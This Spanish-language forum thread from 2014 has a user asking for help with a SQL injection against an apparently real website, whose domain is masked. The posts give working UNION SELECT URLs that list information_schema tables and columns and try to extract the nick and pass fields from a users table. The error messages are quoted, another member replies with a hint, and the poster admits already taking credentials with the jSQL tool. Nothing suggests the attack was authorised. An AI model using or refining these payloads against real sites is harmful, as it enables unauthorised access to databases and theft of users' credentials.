Título: Duda MYSQL injection - "Unknown column 'nick' in 'field list'" Publicado por: Paniic en 24 Agosto 2014, 19:21 pm Tras terminar de estudiar SQL me he puesto a practicar con SQLi y con mi primera web ya he tenido un problema que me desconcierta.
http://www.***.com/index.php?accion=11&id=-1+UNION+SELECT+1,2,3,4,5,table_name,7,8,9,10,11+from+information_schema.tables+limit+53,1-- Encuentro la tabla usuarios http://www.***.com/index.php?accion=11&id=-1+UNION+SELECT+1,2,3,4,5,group_concat(column_name),7,8,9,10,11+from+information_schema.columns+where+table_name=char(117,115,117,097,114,105,111)-- Me muestra id,nick,pass,nombre,mail,fecha http://www.***.com/index.php?accion=11&id=-1+UNION+SELECT+1,2,3,4,5,concat(nick,0x3a,pass),7,8,9,10,11+from+information_schema.columns+where+table_name=char(117,115,117,097,114,105,111)-- Me muestra Falló la consulta.1054: Unknown column 'nick' in 'field list' ¿Porque me dice que no lo encuentra si anteriormente me da todas las columnas de dicha tabla? Saludos y gracias :) Título: Re: Duda MYSQL injection - "Unknown column 'nick' in 'field list'" Publicado por: dRak0 en 24 Agosto 2014, 19:47 pm Si realmente estudiaste SQL , fijate la ultima consulta que realizas.
Título: Re: Duda MYSQL injection - "Unknown column 'nick' in 'field list'" Publicado por: Paniic en 24 Agosto 2014, 20:07 pm Si realmente estudiaste SQL , fijate la ultima consulta que realizas. He avanzado algo. http://www.***.com/index.php?accion=11&id=-1+UNION+SELECT+1,2,3,4,5,concat(nick,0x3a,pass),7,8,9,10,11+from+usuario-- Pero me dice: Falló la consulta.1146: Table '***_ocio.usuario' doesn't exist Y es que "usuario" no está en esta bd, sino en ***_users.usuario Entiendo el error, pero no consigo saber como acceder a la base de datos _users y no a _ocio. Gracias por la pista ! PD: Ya tengo el nick y el pass que he sacado con jSQL pero quiero entender como hacerlo mediante url. |